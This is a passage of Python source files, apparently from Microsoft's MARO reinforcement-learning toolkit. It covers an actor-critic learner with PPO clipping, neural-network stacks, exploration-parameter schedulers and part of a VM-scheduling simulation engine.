        config: Configuration for the AC algorithm.
    """
    def __init__(self, model: LearningModel, config: ActorCriticConfig):
        # Multi-task models must expose "actor" and "critic" heads (single-task models are exempt).
        self.validate_task_names(model.task_names, {"actor", "critic"})
        super().__init__(model, config)

    def _get_values_and_bootstrapped_returns(self, state_sequence, reward_sequence):
        """Compute per-step state values and lambda-return estimates for a trajectory."""
        # detach(): the return estimates serve as fixed targets in the losses below.
        state_values = self._model(state_sequence, task_name="critic").detach().squeeze()
        return_est = get_lambda_returns(
            reward_sequence, state_values, self._config.reward_discount, self._config.lam, k=self._config.k
        )
        return state_values, return_est

    def train(
        self, states: np.ndarray, actions: np.ndarray, log_action_prob: np.ndarray, rewards: np.ndarray
    ):
        """Run ``train_iters`` combined actor-critic updates on one trajectory.

        Args:
            states: Trajectory of states.
            actions: Actions taken at each state.
            log_action_prob: Log-probabilities of those actions under the behavior policy;
                used as the "old" policy when clip_ratio enables PPO-style clipping.
            rewards: Rewards received at each step.
        """
        states = torch.from_numpy(states).to(self._device)
        actions = torch.from_numpy(actions).to(self._device)
        log_action_prob = torch.from_numpy(log_action_prob).to(self._device)
        rewards = torch.from_numpy(rewards).to(self._device)
        state_values, return_est = self._get_values_and_bootstrapped_returns(states, rewards)
        # Both terms are detached, so the advantages stay fixed across the update iterations.
        advantages = return_est - state_values
        for _ in range(self._config.train_iters):
            critic_loss = self._config.critic_loss_func(
                self._model(states, task_name="critic").squeeze(), return_est
            )
            action_prob = self._model(states, task_name="actor").gather(1, actions.unsqueeze(1)).squeeze()  # (N,)
            log_action_prob_new = torch.log(action_prob)
            actor_loss = self._actor_loss(log_action_prob_new, log_action_prob, advantages)
            loss = critic_loss + self._config.actor_loss_coefficient * actor_loss
            self._model.learn(loss)

    def _actor_loss(self, log_action_prob_new, log_action_prob_old, advantages):
        """Policy-gradient actor loss, with PPO clipping when clip_ratio is configured."""
        if self._config.clip_ratio is not None:
            # PPO clipped surrogate objective (https://arxiv.org/pdf/1707.06347.pdf).
            ratio = torch.exp(log_action_prob_new - log_action_prob_old)
            clip_ratio = torch.clamp(ratio, 1 - self._config.clip_ratio, 1 + self._config.clip_ratio)
            actor_loss = -(torch.min(ratio * advantages, clip_ratio * advantages)).mean()
        else:
            actor_loss = -(log_action_prob_new * advantages).mean()
        return actor_loss
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .experience_collection import concat_experiences_by_agent, merge_experiences_with_trajectory_boundaries
from .single_learner_multi_actor_sync_mode import ActorProxy, ActorWorker
__all__ = ["ActorProxy", "ActorWorker", "concat_experiences_by_agent", "merge_experiences_with_trajectory_boundaries"]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from collections import defaultdict
def concat_experiences_by_agent(exp_by_source: dict) -> dict:
    """Concatenate experiences from multiple sources, by agent ID.

    The experience from each source is expected to be already grouped by agent ID. The result is a
    single dictionary keyed by agent ID whose values concatenate, field by field, the experiences
    collected for that agent across all sources.

    Args:
        exp_by_source (dict): Experiences from multiple sources. Each value should consist of
            experiences grouped by agent ID.

    Returns:
        Merged experiences with agent IDs as keys.
    """
    combined = {}
    for source_exp in exp_by_source.values():
        for agent_id, experience in source_exp.items():
            # One defaultdict(list) bucket per agent, created on first encounter.
            agent_bucket = combined.setdefault(agent_id, defaultdict(list))
            for field, values in experience.items():
                agent_bucket[field].extend(values)
    return combined
def merge_experiences_with_trajectory_boundaries(trajectories_by_source) -> dict:
    """Collect each agent's trajectories from multiple sources, keeping them separate.

    Args:
        trajectories_by_source (dict): Agents' trajectories from multiple sources.

    Returns:
        A dict mapping each agent ID to the list of its trajectories, one entry per source.
    """
    collected = defaultdict(list)
    for source_trajectories in trajectories_by_source.values():
        for agent_id, trajectory in source_trajectories.items():
            collected[agent_id].append(trajectory)
    return collected
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .abs_learner import AbsLearner
from .simple_learner import SimpleLearner
__all__ = ["AbsLearner", "SimpleLearner"]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from abc import ABC
class AbsLearner(ABC):
    """Abstract learner class to control the policy learning process.

    Concrete learners are expected to override ``learn`` and ``test``.
    """
    def __init__(self):
        pass

    def learn(self, *args, **kwargs):
        """The outermost training loop logic is implemented here. No-op in the base class."""
        pass

    def test(self):
        """Test policy performance. No-op in the base class."""
        pass
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import sys
from typing import Union
from maro.rl.actor.simple_actor import SimpleActor
from maro.rl.agent.simple_agent_manager import SimpleAgentManager
from maro.rl.dist_topologies.single_learner_multi_actor_sync_mode import ActorProxy
from maro.rl.scheduling.scheduler import Scheduler
from maro.utils import DummyLogger, Logger
from .abs_learner import AbsLearner
class SimpleLearner(AbsLearner):
    """A simple implementation of ``AbsLearner``.

    Args:
        agent_manager (AbsAgentManager): An AgentManager instance that manages all agents.
        actor (SimpleActor or ActorProxy): An SimpleActor or ActorProxy instance responsible for performing roll-outs
            (environment sampling).
        scheduler (AbsScheduler): A scheduler responsible for iterating over episodes and generating exploration
            parameters if necessary.
        logger (Logger): Used to log important messages.
            NOTE(review): the ``DummyLogger()`` default is evaluated once at import time, so every
            SimpleLearner built without an explicit logger shares the same instance — presumably
            harmless for a no-op logger, but worth confirming.
    """
    def __init__(
        self,
        agent_manager: SimpleAgentManager,
        actor: Union[SimpleActor, ActorProxy],
        scheduler: Scheduler,
        logger: Logger = DummyLogger()
    ):
        super().__init__()
        self._agent_manager = agent_manager
        self._actor = actor
        self._scheduler = scheduler
        self._logger = logger

    def learn(self):
        """Main loop for collecting experiences from the actor and using them to update policies."""
        for exploration_params in self._scheduler:
            # Skip the model transfer when the actor shares this learner's agent instances.
            performance, exp_by_agent = self._actor.roll_out(
                model_dict=None if self._is_shared_agent_instance() else self._agent_manager.dump_models(),
                exploration_params=exploration_params
            )
            self._scheduler.record_performance(performance)
            ep_summary = f"ep {self._scheduler.current_ep} - performance: {performance}"
            if exploration_params:
                ep_summary = f"{ep_summary}, exploration_params: {self._scheduler.exploration_params}"
            self._logger.info(ep_summary)
            self._agent_manager.train(exp_by_agent)

    def test(self):
        """Test policy performance."""
        performance, _ = self._actor.roll_out(
            model_dict=self._agent_manager.dump_models(),
            return_details=False
        )
        self._scheduler.record_performance(performance)

    def exit(self, code: int = 0):
        """Tell the remote actor to exit."""
        # Only a remote proxy needs the termination signal; a local actor exits with this process.
        if isinstance(self._actor, ActorProxy):
            self._actor.roll_out(done=True)
        sys.exit(code)

    def load_models(self, dir_path: str):
        """Load agent models from files under ``dir_path``."""
        self._agent_manager.load_models_from_files(dir_path)

    def dump_models(self, dir_path: str):
        """Dump agent models to files under ``dir_path``."""
        self._agent_manager.dump_models_to_files(dir_path)

    def _is_shared_agent_instance(self):
        """If true, the set of agents performing inference in actor is the same as self._agent_manager."""
        return isinstance(self._actor, SimpleActor) and id(self._actor.agents) == id(self._agent_manager)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .abs_block import AbsBlock
from .fc_block import FullyConnectedBlock
from .learning_model import LearningModel, NNStack, OptimizerOptions
__all__ = ["AbsBlock", "FullyConnectedBlock", "LearningModel", "NNStack", "OptimizerOptions"]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from collections import namedtuple
from itertools import chain
from typing import Dict, Union
import torch
import torch.nn as nn
from maro.utils import clone
from maro.utils.exception.rl_toolkit_exception import NNStackDimensionError, MissingOptimizer
from .abs_block import AbsBlock
OptimizerOptions = namedtuple("OptimizerOptions", ["cls", "params"])
class NNStack(nn.Module):
    """An NN stack that consists of a sequence of chainable blocks.

    Args:
        name (str): Name of the stack.
        blocks (AbsBlock): Blocks that comprise the model. They must be chainable, i.e., the output
            dimension of a block must match the input dimension of its successor.
    """
    # FIX: the varargs annotation was the list literal ``[AbsBlock]``, which is not a valid type
    # expression — per PEP 484, *args is annotated with the element type. The forward-reference
    # string also keeps the annotation lazily evaluated.
    def __init__(self, name: str, *blocks: "AbsBlock"):
        super().__init__()
        self._name = name
        # The stack's overall dimensions are those of its first and last blocks.
        self._input_dim = blocks[0].input_dim
        self._output_dim = blocks[-1].output_dim
        self._net = nn.Sequential(*blocks)

    @property
    def name(self):
        return self._name

    @property
    def input_dim(self):
        return self._input_dim

    @property
    def output_dim(self):
        return self._output_dim

    def forward(self, inputs):
        """Feedforward computation.

        Args:
            inputs: Inputs to the model.

        Returns:
            Outputs from the model.
        """
        return self._net(inputs)
class LearningModel(nn.Module):
    """NN model that consists of multiple task heads and an optional shared stack.

    Args:
        task_stacks (NNStack): NNStack instances, each of which performs a designated task.
        shared_stack (NNStack): Network module that forms the shared part of the model. Defaults to None.
        optimizer_options (Union[OptimizerOptions, Dict[str, OptimizerOptions]]): Optimizer options for
            the internal stacks. If none, no optimizer will be created for the model and the model will not
            be trainable. If it is a single OptimizerOptions instance, an optimizer will be created to jointly
            optimize all parameters of the model. If it is a dictionary, for each `(key, value)` pair, an optimizer
            specified by `value` will be created for the internal stack named `key`. Defaults to None.
    """
    def __init__(
        self,
        *task_stacks: NNStack,
        shared_stack: NNStack = None,
        optimizer_options: Union[OptimizerOptions, Dict[str, OptimizerOptions]] = None
    ):
        # Fail fast if the shared stack's output dimension does not match each task head's input.
        self.validate_dims(*task_stacks, shared_stack=shared_stack)
        super().__init__()
        # All stacks by name (task heads plus shared), used for per-stack optimizer creation below.
        self._stack_dict = {stack.name: stack for stack in task_stacks}
        # shared stack
        self._shared_stack = shared_stack
        if self._shared_stack:
            self._stack_dict[self._shared_stack.name] = self._shared_stack
        # task_heads
        self._task_stack_dict = nn.ModuleDict({task_stack.name: task_stack for task_stack in task_stacks})
        self._input_dim = self._shared_stack.input_dim if self._shared_stack else task_stacks[0].input_dim
        # Single-task models expose the head's output_dim directly; multi-task models expose a dict.
        if len(task_stacks) == 1:
            self._output_dim = task_stacks[0].output_dim
        else:
            self._output_dim = {task_stack.name: task_stack.output_dim for task_stack in task_stacks}
        self._is_trainable = optimizer_options is not None
        if self._is_trainable:
            if isinstance(optimizer_options, OptimizerOptions):
                # A single optimizer jointly covering every parameter of the model.
                self._optimizer = optimizer_options.cls(self.parameters(), **optimizer_options.params)
            else:
                # One optimizer per named internal stack.
                self._optimizer = {
                    stack_name: opt.cls(self._stack_dict[stack_name].parameters(), **opt.params)
                    for stack_name, opt in optimizer_options.items()
                }
        else:
            # No optimizer: switch to eval mode and freeze all parameters.
            self.eval()
            for param in self.parameters():
                param.requires_grad = False

    def __getstate__(self):
        """Serialization support: drop the optimizer and mark the serialized copy untrainable."""
        dic = self.__dict__.copy()
        if "_optimizer" in dic:
            del dic["_optimizer"]
        dic["_is_trainable"] = False
        return dic

    def __setstate__(self, dic: dict):
        self.__dict__ = dic

    @property
    def task_names(self) -> [str]:
        return list(self._task_stack_dict.keys())

    @property
    def shared_stack(self):
        return self._shared_stack

    @property
    def input_dim(self):
        return self._input_dim

    @property
    def output_dim(self):
        return self._output_dim

    @property
    def is_trainable(self) -> bool:
        return self._is_trainable

    def _forward(self, inputs, task_name: str = None):
        # Run the shared bottom first, if present.
        if self._shared_stack:
            inputs = self._shared_stack(inputs)
        # A single-task model ignores task_name entirely.
        if len(self._task_stack_dict) == 1:
            return list(self._task_stack_dict.values())[0](inputs)
        if task_name is None:
            return {name: task_stack(inputs) for name, task_stack in self._task_stack_dict.items()}
        if isinstance(task_name, list):
            return {name: self._task_stack_dict[name](inputs) for name in task_name}
        else:
            return self._task_stack_dict[task_name](inputs)

    def forward(self, inputs, task_name: str = None, is_training: bool = True):
        """Feedforward computations for the given head(s).

        Args:
            inputs: Inputs to the model.
            task_name (str): The name of the task for which the network output is required. If the model contains only
                one task module, the task_name is ignored and the output of that module will be returned. If the model
                contains multiple task modules, then 1) if task_name is None, the output from all task modules will be
                returned in the form of a dictionary; 2) if task_name is a list, the outputs from the task modules
                specified in the list will be returned in the form of a dictionary; 3) if this is a single string,
                the output from the corresponding task module will be returned.
            is_training (bool): If true, all torch submodules will be set to training mode, and auto-differentiation
                will be turned on. Defaults to True.

        Returns:
            Outputs from the required head(s).
        """
        self.train(mode=is_training)
        if is_training:
            return self._forward(inputs, task_name)
        # Inference: disable autograd so no computation graph is built.
        with torch.no_grad():
            return self._forward(inputs, task_name)

    def learn(self, loss):
        """Use the loss to back-propagate gradients and apply them to the underlying parameters."""
        if not self._is_trainable:
            raise MissingOptimizer("No optimizer registered to the model")
        # Reset accumulated gradients on every registered optimizer.
        if isinstance(self._optimizer, dict):
            for optimizer in self._optimizer.values():
                optimizer.zero_grad()
        else:
            self._optimizer.zero_grad()
        # Obtain gradients through back-propagation
        loss.backward()
        # Apply gradients
        if isinstance(self._optimizer, dict):
            for optimizer in self._optimizer.values():
                optimizer.step()
        else:
            self._optimizer.step()

    def soft_update(self, other_model: nn.Module, tau: float):
        """Soft-update parameters towards ``other_model``: p = (1 - tau) * p + tau * p_other."""
        for params, other_params in zip(self.parameters(), other_model.parameters()):
            params.data = (1 - tau) * params.data + tau * other_params.data

    def copy(self):
        """Return a clone of the model."""
        return clone(self)

    def load(self, state_dict):
        """Load parameters from an in-memory state dict."""
        self.load_state_dict(state_dict)

    def dump(self):
        """Return the model's state dict."""
        return self.state_dict()

    def load_from_file(self, path: str):
        """Load parameters from a file produced by ``dump_to_file``."""
        self.load_state_dict(torch.load(path))

    def dump_to_file(self, path: str):
        """Save the model's state dict to a file."""
        torch.save(self.state_dict(), path)

    @staticmethod
    def validate_dims(*task_stacks, shared_stack=None):
        """Check each task stack's input dimension against the shared stack's output dimension."""
        if shared_stack:
            expected_dim = shared_stack.output_dim
            for task_stack in task_stacks:
                if task_stack.input_dim != expected_dim:
                    raise NNStackDimensionError(
                        f"Expected input dimension {expected_dim} for task module: {task_stack.name}, "
                        f"got {task_stack.input_dim}")
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import Callable
from maro.utils.exception.rl_toolkit_exception import InfiniteTrainingLoop, InvalidEpisode
class Scheduler(object):
    """Iterator that produces exploration parameters for successive episodes.

    Args:
        max_ep (int): Maximum number of episodes to be run. If -1, an early stopping callback is expected
            to prevent the training loop from running forever.
        early_stopping_checker (Callable): Function that returns a boolean indicating whether early
            stopping should be triggered. Defaults to None, in which case no early stopping check
            will be performed.
    """
    def __init__(self, max_ep: int, early_stopping_checker: Callable = None):
        if max_ep < -1:
            raise InvalidEpisode("max_episode can only be a non-negative integer or -1.")
        if max_ep == -1 and early_stopping_checker is None:
            raise InfiniteTrainingLoop(
                "A positive max_ep or an early stopping checker must be provided to prevent the training loop from "
                "running forever."
            )
        self._max_ep = max_ep
        self._early_stopping_checker = early_stopping_checker
        self._current_ep = -1
        self._performance_history = []
        self._exploration_params = None

    def __iter__(self):
        return self

    def __next__(self):
        self._current_ep += 1
        # Stop when the episode budget is exhausted ...
        if self._current_ep == self._max_ep:
            raise StopIteration
        # ... or when the early-stopping callback fires on the recorded performance history.
        checker = self._early_stopping_checker
        if checker and checker(self._performance_history):
            raise StopIteration
        self._exploration_params = self.get_next_exploration_params()
        return self._exploration_params

    def get_next_exploration_params(self):
        """Hook for subclasses; the base scheduler produces no exploration parameters."""
        pass

    @property
    def current_ep(self):
        """Index of the current episode (-1 before the first iteration)."""
        return self._current_ep

    @property
    def exploration_params(self):
        """The most recently generated exploration parameters."""
        return self._exploration_params

    def record_performance(self, performance):
        """Append an episode's performance for use by the early-stopping checker."""
        self._performance_history.append(performance)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import Callable, Union
import numpy as np
from .scheduler import Scheduler
class LinearParameterScheduler(Scheduler):
    """Static exploration parameter generator based on a linear schedule.

    Args:
        max_ep (int): Maximum number of episodes to run.
        early_stopping_checker (Callable): Function that returns a boolean indicating whether early stopping should
            be triggered. Defaults to None, in which case no early stopping check will be performed.
        parameter_names ([str]): List of exploration parameter names.
        start_values (Union[float, list, tuple, np.ndarray]): Exploration parameter values for the first episode.
            Scalars (int or float) are broadcast to all parameters. These values must correspond to
            ``parameter_names``.
        end_values (Union[float, list, tuple, np.ndarray]): Exploration parameter values for the last episode.
            Scalars (int or float) are broadcast to all parameters. These values must correspond to
            ``parameter_names``.
    """
    def __init__(
        self,
        max_ep: int,
        early_stopping_checker: Callable = None,
        *,
        parameter_names: [str],
        start_values: Union[float, list, tuple, np.ndarray],
        end_values: Union[float, list, tuple, np.ndarray]
    ):
        super().__init__(max_ep, early_stopping_checker=early_stopping_checker)
        self._parameter_names = parameter_names
        # FIX: normalize both endpoints to float arrays. The original isinstance(..., float)
        # rejected int scalars (which later crashed on .copy()) and integer sequences became
        # int arrays that cannot absorb a float delta in place.
        self._current_values = self._to_value_array(start_values)
        end_values = self._to_value_array(end_values)
        # Per-episode increment; reaches end_values exactly at episode max_ep - 1.
        self._delta = (end_values - self._current_values) / (self._max_ep - 1)

    def _to_value_array(self, values) -> np.ndarray:
        """Broadcast a scalar to all parameters, or convert a sequence/array to a float array."""
        if isinstance(values, (int, float)):
            return values * np.ones(len(self._parameter_names))
        return np.asarray(values, dtype=float)

    def get_next_exploration_params(self):
        """Return the parameters for the current episode and advance the schedule by one step."""
        current_values = self._current_values.copy()
        self._current_values += self._delta
        return dict(zip(self._parameter_names, current_values))
class TwoPhaseLinearParameterScheduler(Scheduler):
    """Exploration parameter generator based on two linear schedules joined together.

    Args:
        max_ep (int): Maximum number of episodes to run.
        early_stopping_checker (Callable): Function that returns a boolean indicating whether early stopping should
            be triggered. Defaults to None, in which case no early stopping check will be performed.
        parameter_names ([str]): List of exploration parameter names.
        split_ep (float): The episode where the switch from the first linear schedule to the second occurs.
        start_values (Union[float, list, tuple, np.ndarray]): Exploration parameter values for the first episode.
            Scalars (int or float) are broadcast to all parameters. These values must correspond to
            ``parameter_names``.
        mid_values (Union[float, list, tuple, np.ndarray]): Exploration parameter values where the switch from the
            first linear schedule to the second occurs. In other words, this is the exploration rate where the first
            linear schedule ends and the second begins. These values must correspond to ``parameter_names``.
        end_values (Union[float, list, tuple, np.ndarray]): Exploration parameter values for the last episode.
            These values must correspond to ``parameter_names``.

    Returns:
        An iterator over the series of exploration rates from episode 0 to ``max_ep`` - 1.
    """
    def __init__(
        self,
        max_ep: int,
        early_stopping_checker: Callable = None,
        *,
        parameter_names: [str],
        split_ep: float,
        start_values: Union[float, list, tuple, np.ndarray],
        mid_values: Union[float, list, tuple, np.ndarray],
        end_values: Union[float, list, tuple, np.ndarray]
    ):
        if split_ep <= 0 or split_ep >= max_ep:
            raise ValueError("split_ep must be between 0 and max_ep - 1.")
        super().__init__(max_ep, early_stopping_checker=early_stopping_checker)
        self._parameter_names = parameter_names
        self._split_ep = split_ep
        # FIX: normalize all three anchors to float arrays. The original isinstance(..., float)
        # rejected int scalars (which later crashed on .copy()) and integer sequences became
        # int arrays that cannot absorb a float delta in place.
        self._current_values = self._to_value_array(start_values)
        mid_values = self._to_value_array(mid_values)
        end_values = self._to_value_array(end_values)
        # Phase 1 slope: start -> mid over the first split_ep episodes.
        self._delta_1 = (mid_values - self._current_values) / split_ep
        # Phase 2 slope: mid -> end over the remaining episodes.
        self._delta_2 = (end_values - mid_values) / (max_ep - split_ep - 1)

    def _to_value_array(self, values) -> np.ndarray:
        """Broadcast a scalar to all parameters, or convert a sequence/array to a float array."""
        if isinstance(values, (int, float)):
            return values * np.ones(len(self._parameter_names))
        return np.asarray(values, dtype=float)

    def get_next_exploration_params(self):
        """Return current parameters and advance along phase 1 or phase 2 of the schedule."""
        current_values = self._current_values.copy()
        self._current_values += self._delta_1 if self._current_ep < self._split_ep else self._delta_2
        return dict(zip(self._parameter_names, current_values))
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .abs_shaper import AbsShaper
from .action_shaper import ActionShaper
from .experience_shaper import ExperienceShaper
from .k_step_experience_shaper import KStepExperienceKeys, KStepExperienceShaper
from .state_shaper import StateShaper
__all__ = [
"AbsShaper",
"ActionShaper",
"ExperienceShaper",
"KStepExperienceKeys", "KStepExperienceShaper",
"StateShaper"
]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .abs_store import AbsStore
from .column_based_store import ColumnBasedStore, OverwriteType
__all__ = ["AbsStore", "ColumnBasedStore", "OverwriteType"]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import shutil
import tarfile
from typing import Dict, List
from yaml import safe_load
from maro.backends.frame import FrameBase, SnapshotList
from maro.cli.data_pipeline.utils import StaticParameter, download_file
from maro.data_lib import BinaryReader
from maro.event_buffer import CascadeEvent, EventBuffer, MaroEvents
from maro.simulator.scenarios.abs_business_engine import AbsBusinessEngine
from maro.simulator.scenarios.helpers import DocableDict
from maro.utils.logger import CliLogger
from maro.utils.utils import convert_dottable
from .common import AllocateAction, DecisionPayload, Latency, PostponeAction, VmRequestPayload
from .cpu_reader import CpuReader
from .enums import Events, PmState, PostponeType, VmCategory
from .frame_builder import build_frame
from .physical_machine import PhysicalMachine
from .virtual_machine import VirtualMachine
# User-facing description of the scenario's metrics (grammar fixes only).
metrics_desc = """
VM scheduling metrics used to provide statistics information until now.
It contains the following keys:
total_vm_requests (int): Total VM requests.
total_energy_consumption (float): Accumulative total PM energy consumption.
successful_allocation (int): Accumulative successful VM allocation until now.
successful_completion (int): Accumulative successful completion of tasks.
failed_allocation (int): Accumulative failed VM allocation until now.
failed_completion (int): Accumulative failed VM completion due to PM overloading.
total_latency (Latency): Accumulative used buffer time until now.
total_oversubscriptions (int): Accumulative over-subscriptions. The unit is PM amount * tick.
total_overload_pms (int): Accumulative overload PMs. The unit is PM amount * tick.
total_overload_vms (int): Accumulative VMs on overload PMs. The unit is VM amount * tick.
"""
logger = CliLogger(name=__name__)
class VmSchedulingBusinessEngine(AbsBusinessEngine):
    """Business engine of the VM scheduling scenario.

    Drives the simulation tick by tick: reads VM requests and CPU readings
    from binary data files (downloading them on demand), maintains PM/VM
    state in a frame, emits pending-decision events for the agent, and
    applies the returned allocate/postpone actions.
    """
    def __init__(
        self,
        event_buffer: EventBuffer,
        topology: str,
        start_tick: int,
        max_tick: int,
        snapshot_resolution: int,
        max_snapshots: int,
        additional_options: dict = {}  # NOTE(review): mutable default argument; only safe while never mutated — consider a None sentinel.
    ):
        super().__init__(
            scenario_name="vm_scheduling", event_buffer=event_buffer, topology=topology, start_tick=start_tick,
            max_tick=max_tick, snapshot_resolution=snapshot_resolution, max_snapshots=max_snapshots,
            additional_options=additional_options
        )
        # Initialize environment metrics.
        self._init_metrics()
        # Load configurations.
        self._load_configs()
        self._register_events()
        self._init_frame()
        # Initialize simulation data.
        self._init_data()
        # PMs list used for quick accessing.
        self._init_pms()
        # All living VMs.
        self._live_vms: Dict[int, VirtualMachine] = {}
        # All request payload of the pending decision VMs.
        # NOTE: Need naming suggestion.
        self._pending_vm_request_payload: Dict[int, VmRequestPayload] = {}
        # Readers over the binary VM-request table and the CPU-readings files.
        self._vm_reader = BinaryReader(self._config.VM_TABLE)
        self._vm_item_picker = self._vm_reader.items_tick_picker(self._start_tick, self._max_tick, time_unit="s")
        self._cpu_reader = CpuReader(data_path=self._config.CPU_READINGS, start_tick=self._start_tick)
        self._tick: int = 0
        # Id of the VM whose decision event is currently outstanding.
        self._pending_action_vm_id: int = 0
    @property
    def configs(self) -> dict:
        """dict: Current configuration."""
        return self._config
    @property
    def frame(self) -> FrameBase:
        """FrameBase: Current frame."""
        return self._frame
    @property
    def snapshots(self) -> SnapshotList:
        """SnapshotList: Current snapshot list."""
        return self._snapshots
    def _load_configs(self):
        """Load configurations."""
        # Update self._config_path with current file path.
        self.update_config_root_path(__file__)
        with open(os.path.join(self._config_path, "config.yml")) as fp:
            self._config = convert_dottable(safe_load(fp))
        self._delay_duration: int = self._config.DELAY_DURATION
        self._buffer_time_budget: int = self._config.BUFFER_TIME_BUDGET
        # Oversubscription rate.
        self._max_cpu_oversubscription_rate: float = self._config.MAX_CPU_OVERSUBSCRIPTION_RATE
        self._max_memory_oversubscription_rate: float = self._config.MAX_MEM_OVERSUBSCRIPTION_RATE
        self._max_utilization_rate: float = self._config.MAX_UTILIZATION_RATE
        # Load PM related configs.
        self._pm_amount: int = self._cal_pm_amount()
        self._kill_all_vms_if_overload = self._config.KILL_ALL_VMS_IF_OVERLOAD
    def _init_metrics(self):
        """Initialize all environment metrics counters to zero."""
        # Env metrics.
        self._total_vm_requests: int = 0
        self._total_energy_consumption: float = 0.0
        self._successful_allocation: int = 0
        self._successful_completion: int = 0
        self._failed_allocation: int = 0
        self._failed_completion: int = 0
        self._total_latency: Latency = Latency()
        self._total_oversubscriptions: int = 0
        self._total_overload_pms: int = 0
        self._total_overload_vms: int = 0
    def _init_data(self):
        """If the file does not exist, then trigger the short data pipeline to download the processed data."""
        vm_table_data_path = self._config.VM_TABLE
        if vm_table_data_path.startswith("~"):
            vm_table_data_path = os.path.expanduser(vm_table_data_path)
        cpu_readings_data_path = self._config.CPU_READINGS
        if cpu_readings_data_path.startswith("~"):
            cpu_readings_data_path = os.path.expanduser(cpu_readings_data_path)
        if (not os.path.exists(vm_table_data_path)) or (not os.path.exists(cpu_readings_data_path)):
            logger.info_green("Lack data. Start preparing data.")
            self._download_processed_data()
            logger.info_green("Data preparation is finished.")
    def _cal_pm_amount(self) -> int:
        """Total PM count summed over all PM types declared in the config."""
        amount: int = 0
        for pm_type in self._config.PM:
            amount += pm_type["amount"]
        return amount
    def _init_pms(self):
        """Initialize the physical machines based on the config setting. The PM id starts from 0."""
        # TODO: Improve the scalability. Like the use of multiple PM sets.
        self._machines = self._frame.pms
        # PM type dictionary.
        self._pm_type_dict: dict = {}
        pm_id = 0
        for pm_type in self._config.PM:
            amount = pm_type["amount"]
            self._pm_type_dict[pm_type["PM_type"]] = pm_type
            while amount > 0:
                pm = self._machines[pm_id]
                pm.set_init_state(
                    id=pm_id,
                    cpu_cores_capacity=pm_type["CPU"],
                    memory_capacity=pm_type["memory"],
                    pm_type=pm_type["PM_type"],
                    oversubscribable=PmState.EMPTY
                )
                amount -= 1
                pm_id += 1
    def reset(self):
        """Reset internal states for episode."""
        self._total_vm_requests: int = 0
        self._total_energy_consumption: float = 0.0
        self._successful_allocation: int = 0
        self._successful_completion: int = 0
        self._failed_allocation: int = 0
        self._failed_completion: int = 0
        self._total_latency: Latency = Latency()
        self._total_oversubscriptions: int = 0
        self._total_overload_pms: int = 0
        self._total_overload_vms: int = 0
        self._frame.reset()
        self._snapshots.reset()
        for pm in self._machines:
            pm.reset()
        self._live_vms.clear()
        self._pending_vm_request_payload.clear()
        # Rewind the data readers to the episode start.
        self._vm_reader.reset()
        self._vm_item_picker = self._vm_reader.items_tick_picker(self._start_tick, self._max_tick, time_unit="s")
        self._cpu_reader.reset()
    def _init_frame(self):
        """Build the frame (PM nodes) and keep a handle on its snapshot list."""
        self._frame = build_frame(self._pm_amount, self.calc_max_snapshots())
        self._snapshots = self._frame.snapshots
    def step(self, tick: int):
        """Push business to next step.
        Args:
            tick (int): Current tick to process.
        """
        self._tick = tick
        # All vm's cpu utilization at current tick.
        cur_tick_cpu_utilization = self._cpu_reader.items(tick=tick)
        # Process finished VMs.
        self._process_finished_vm()
        # Update all live VMs CPU utilization.
        self._update_vm_workload(cur_tick_cpu_utilization=cur_tick_cpu_utilization)
        # Update all PM CPU utilization.
        self._update_pm_workload()
        for vm in self._vm_item_picker.items(tick):
            # TODO: Batch request support.
            vm_info = VirtualMachine(
                id=vm.vm_id,
                cpu_cores_requirement=vm.vm_cpu_cores,
                memory_requirement=vm.vm_memory,
                lifetime=vm.vm_lifetime,
                sub_id=vm.sub_id,
                deployment_id=vm.deploy_id,
                category=VmCategory(vm.vm_category)
            )
            if vm.vm_id not in cur_tick_cpu_utilization:
                raise Exception(f"The VM id: '{vm.vm_id}' does not exist at this tick.")
            vm_info.add_utilization(cpu_utilization=cur_tick_cpu_utilization[vm.vm_id])
            vm_req_payload: VmRequestPayload = VmRequestPayload(
                vm_info=vm_info,
                remaining_buffer_time=self._buffer_time_budget
            )
            # Each request becomes a cascade event so the pending-decision
            # event can be attached to it in _on_vm_required.
            vm_request_event = self._event_buffer.gen_cascade_event(
                tick=tick,
                event_type=Events.REQUEST,
                payload=vm_req_payload
            )
            self._event_buffer.insert_event(event=vm_request_event)
            self._total_vm_requests += 1
    def post_step(self, tick: int):
        """End-of-tick bookkeeping: energy, oversubscription, overload, snapshots.
        Returns:
            bool: True when the episode should stop (max tick reached).
        """
        # Update energy to the environment metrics.
        total_energy: float = 0.0
        for pm in self._machines:
            if pm.oversubscribable and pm.cpu_cores_allocated > pm.cpu_cores_capacity:
                self._total_oversubscriptions += 1
            total_energy += pm.energy_consumption
            # Overload PMs.
            if pm.cpu_utilization > 100:
                self._overload(pm.id)
        self._total_energy_consumption += total_energy
        if (tick + 1) % self._snapshot_resolution == 0:
            # NOTE: We should use frame_index method to get correct index in snapshot list.
            self._frame.take_snapshot(self.frame_index(tick))
        # Stop current episode if we reach max tick.
        return tick + 1 >= self._max_tick
    def get_event_payload_detail(self) -> dict:
        """dict: Event payload details of current scenario."""
        return {
            Events.REQUEST.name: VmRequestPayload.summary_key,
            MaroEvents.PENDING_DECISION.name: DecisionPayload.summary_key
        }
    def get_agent_idx_list(self) -> List[int]:
        """Get a list of agent index."""
        # Not applicable to this scenario; implicitly returns None.
        pass
    def get_node_mapping(self) -> dict:
        """dict: Node mapping."""
        node_mapping = {}
